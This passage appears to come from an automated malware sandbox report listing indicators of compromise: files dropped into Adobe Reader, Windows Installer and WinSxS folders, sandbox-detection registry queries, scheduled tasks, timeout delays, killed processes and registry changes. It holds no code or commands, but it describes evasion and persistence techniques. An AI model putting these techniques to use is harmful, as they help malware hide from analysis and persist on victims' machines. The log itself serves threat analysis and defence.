(x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\send-for-sign\js\selector.js RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-recent-files\js\selector.js RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\on-boarding\images\themeless\cs_get.svg RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\desktop-connector-files\js\nls\ca-es\ui-strings.js RdrServicesUpdater.exe File opened for modification C:\Program Files (x86)\rover\Speak\Speak.003.png Rover.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\images\s_anonymoususer_18.svg RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\images\themes\dark\s_checkbox_selected_18.svg RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\search-summary\js\nls\pl-pl\ui-strings.js RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\AppStore_icon.svg RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\combinepdf\images\rhp_world_icon_2x.png RdrServicesUpdater.exe File created C:\Program Files (x86)\rover\Come\Come.018.png Rover.exe File created C:\Program Files (x86)\rover\Eat\Eat.026.png Rover.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\reviews\images\themes\dark\cstm_brand_preview.png RdrServicesUpdater.exe File opened for modification C:\Program Files (x86)\rover\_2Idle\_2Idle.004.png Rover.exe File created C:\Program Files (x86)\rover\_10Idle\_10Idle.006.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Reading\Reading.018.png Rover.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\core\dev\nls\uk-ua\ui-strings.js RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\exportpdfupsell-app-tool-view.js RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\zh-cn\ui-strings.js RdrServicesUpdater.exe File created C:\Program Files (x86)\rover\Exit\Exit.027.png Rover.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\images\download.svg RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\reviews\js\nls\pl-pl\ui-strings.js RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\ui-strings.js RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\app\dev\nls\zh-tw\ui-strings.js RdrServicesUpdater.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\form_responses.gif msiexec.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\on-boarding\images\themeless\af_get.svg RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-computer\js\nls\ja-jp\ui-strings.js RdrServicesUpdater.exe File created C:\Program Files (x86)\rover\Exit\Exit.023.png Rover.exe File created C:\Program Files (x86)\rover\_2Idle\_2Idle.008.png Rover.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-computer-select\js\nls\sv-se\ui-strings.js RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-computer-select\js\nls\ko-kr\ui-strings.js RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-files\images\themes\dark\icons_retina.png RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\walk-through\js\nls\en-gb\ui-strings.js RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\images\file_types\selection-actions.png RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\images\themes\dark\ccloud_retina.png RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\images\themes\dark\s_share_18.svg RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-computer-select\js\nls\zh-cn\ui-strings.js RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\unified-share\js\nls\pt-br\ui-strings.js RdrServicesUpdater.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\search-summary\js\nls\en-il\ui-strings.js RdrServicesUpdater.exe File opened for modification C:\Program Files (x86)\rover\Lick\Lick.007.png Rover.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\images\file_types\hi_contrast\aic_file_icons_highcontrast.png RdrServicesUpdater.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File created C:\Windows\Installer\e5cdcd8.HDR msiexec.exe File created C:\Windows\Installer\e5cdce2.HDR msiexec.exe File created C:\Windows\Installer\e5cdcf0.HDR msiexec.exe File created C:\Windows\Installer\e5cdcf7.HDR msiexec.exe File created C:\Windows\Installer\e5cdcd7.HDR msiexec.exe File opened for modification C:\Windows\Installer\MSIDF63.tmp msiexec.exe File created C:\Windows\Installer\e5cdcdf.HDR msiexec.exe File opened for modification C:\Windows\Installer\e5cdce5.HDR msiexec.exe File created C:\Windows\Installer\e5cdcff.HDR msiexec.exe File opened for modification C:\Windows\Installer\MSIE965.tmp msiexec.exe File created \??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.22000.318_none_094337207a9adec3\MsoIrmProtector.doc.exe xpxlzrjv.exe File created C:\Windows\Installer\e5cdcd4.HDR msiexec.exe File created C:\Windows\SystemTemp\~DF47757E9B7B71DDE3.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIDC2F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE321.tmp msiexec.exe File opened for modification C:\Windows\Installer\e5cdcd0.HDR msiexec.exe File opened for modification C:\Windows\Installer\e5cdcd6.HDR msiexec.exe File opened for modification C:\Windows\Installer\e5cdcea.HDR msiexec.exe File opened for modification C:\Windows\Installer\e5cdcf2.HDR msiexec.exe File opened for modification C:\Windows\Installer\e5cdcf3.HDR msiexec.exe File created C:\Windows\Installer\e5cdcf8.HDR msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\e5cdd01.HDR msiexec.exe File opened for modification C:\Windows\Installer\MSIE6FC.tmp msiexec.exe File opened for modification C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\PDXFile_8.ico msiexec.exe File created C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\PDFFile_8.ico msiexec.exe File opened for modification C:\Windows\Installer\MSIE978.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF3B0.tmp msiexec.exe File opened for modification C:\Windows\Installer\e5cdcf9.HDR msiexec.exe File opened for modification C:\Windows\Installer\e5cdcd4.HDR msiexec.exe File created C:\Windows\Installer\e5cdce0.HDR msiexec.exe File opened for modification C:\Windows\Installer\MSIE76B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDDDB.tmp msiexec.exe File opened for modification C:\Windows\Installer\e5cdcd1.HDR msiexec.exe File created C:\Windows\Installer\e5cdcd3.HDR msiexec.exe File opened for modification C:\Windows\Installer\e5cdcd8.HDR msiexec.exe File opened for modification C:\Windows\Installer\e5cdcdb.HDR msiexec.exe File created C:\Windows\Installer\e5cdcfd.HDR msiexec.exe File opened for modification C:\Windows\Installer\MSIF402.tmp msiexec.exe File opened for modification \??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.22000.318_none_094337207a9adec3\MsoIrmProtector.doc.exe xpxlzrjv.exe File opened for modification C:\Windows\Installer\MSIE2D2.tmp msiexec.exe File created C:\Windows\Installer\e5cdcd9.HDR msiexec.exe File opened for modification C:\Windows\Installer\e5cdcf1.HDR msiexec.exe File opened for modification C:\Windows\Installer\e5cdcf5.HDR msiexec.exe File opened for modification C:\Windows\Installer\e5cdcfa.HDR msiexec.exe File created C:\Windows\Installer\e5cdcfe.HDR msiexec.exe File opened for modification C:\Windows\Installer\MSIE966.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDF85.tmp msiexec.exe File opened for modification C:\Windows\Installer\e5cdced.HDR msiexec.exe File opened for modification C:\Windows\Installer\e5cdcf8.HDR msiexec.exe File opened for modification C:\Windows\Installer\e5cdcfd.HDR msiexec.exe File opened for modification C:\Windows\Installer\MSIF39F.tmp msiexec.exe File created \??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.22000.318_none_1397e172aefba0be\MsoIrmProtector.doc.exe xpxlzrjv.exe File opened for modification C:\Windows\Installer\e5cdcdd.HDR msiexec.exe File opened for modification C:\Windows\Installer\e5cdce2.HDR msiexec.exe File created C:\Windows\Installer\e5cdce8.HDR msiexec.exe File opened for modification C:\Windows\Installer\e5cdce8.HDR msiexec.exe File created C:\Windows\Installer\e5cdcf5.HDR msiexec.exe File opened for modification C:\Windows\Installer\e5cdcf6.HDR msiexec.exe File opened for modification C:\Windows\Installer\MSIE77C.tmp msiexec.exe File opened for modification C:\Windows\Installer\e5cdcd5.HDR msiexec.exe File created C:\Windows\Installer\e5cdcea.HDR msiexec.exe File opened for modification C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\XDPFile_8.ico msiexec.exe File opened for modification C:\Windows\Installer\MSIF442.tmp msiexec.exe -
pid Process 5368 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5952 5048 WerFault.exe 142 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 msinfo32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID msinfo32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs msinfo32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 msinfo32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID msinfo32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs msinfo32.exe -
Checks processor information in registry 2 TTPs 19 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5368 schtasks.exe 5888 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 4632 timeout.exe 3832 timeout.exe 5952 timeout.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msinfo32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msinfo32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMajorRelease msinfo32.exe -
Kills process with taskkill 4 IoCs
pid Process 4420 taskkill.exe 5988 taskkill.exe 5540 taskkill.exe 5984 taskkill.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "1620921239" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy iexplore.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9C6A861C-B233-4994-AFB1-C158EE4FC578}\Policy = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B723F941-52A2-4392-B500-60F3889659B4}\AppName = "AcroRd32.exe" MsiExec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0" iexplore.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B7278BD0-7970-47D6-8954-99B2343EED88} msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31108464" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{15B3FB63-66F4-4EFC-B717-BB283B85E79B}\AppPath = "C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8E1F80F4-953F-41E7-8460-E64AE5BE4ED3}\Policy = "3" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B723F941-52A2-4392-B500-60F3889659B4}\Policy = "3" MsiExec.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy MsiExec.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B723F941-52A2-4392-B500-60F3889659B4} MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\BrowserEmulation iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395196024" iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8E1F80F4-953F-41E7-8460-E64AE5BE4ED3}\AppPath = "C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1" iexplore.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{15B3FB63-66F4-4EFC-B717-BB283B85E79B} msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{15B3FB63-66F4-4EFC-B717-BB283B85E79B}\Policy = "3" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8" iexplore.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{BD57A9B2-4E7D-4892-9107-9F4106472DA4} msiexec.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights MsiExec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9C6A861C-B233-4994-AFB1-C158EE4FC578} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8E1F80F4-953F-41E7-8460-E64AE5BE4ED3}\AppName = "AdobeCollabSync.exe" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B7278BD0-7970-47D6-8954-99B2343EED88}\Policy = "3" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1" iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9C6A861C-B233-4994-AFB1-C158EE4FC578}\AppPath = "C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{BD57A9B2-4E7D-4892-9107-9F4106472DA4}\Compatibility Flags = "1024" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0" iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9C6A861C-B233-4994-AFB1-C158EE4FC578}\AppName = "AcroRd32.exe" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B7278BD0-7970-47D6-8954-99B2343EED88}\AppPath = "C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroCEF" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9" iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B723F941-52A2-4392-B500-60F3889659B4}\AppPath = "C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader" MsiExec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\ msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8E1F80F4-953F-41E7-8460-E64AE5BE4ED3} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B7278BD0-7970-47D6-8954-99B2343EED88}\AppName = "RdrCEF.exe" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{15B3FB63-66F4-4EFC-B717-BB283B85E79B}\AppName = "AcroBroker.exe" msiexec.exe -
Modifies data under HKEY_USERS 18 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A\52C64B7E msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "191" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe -
Modifies registry class 64 IoCs
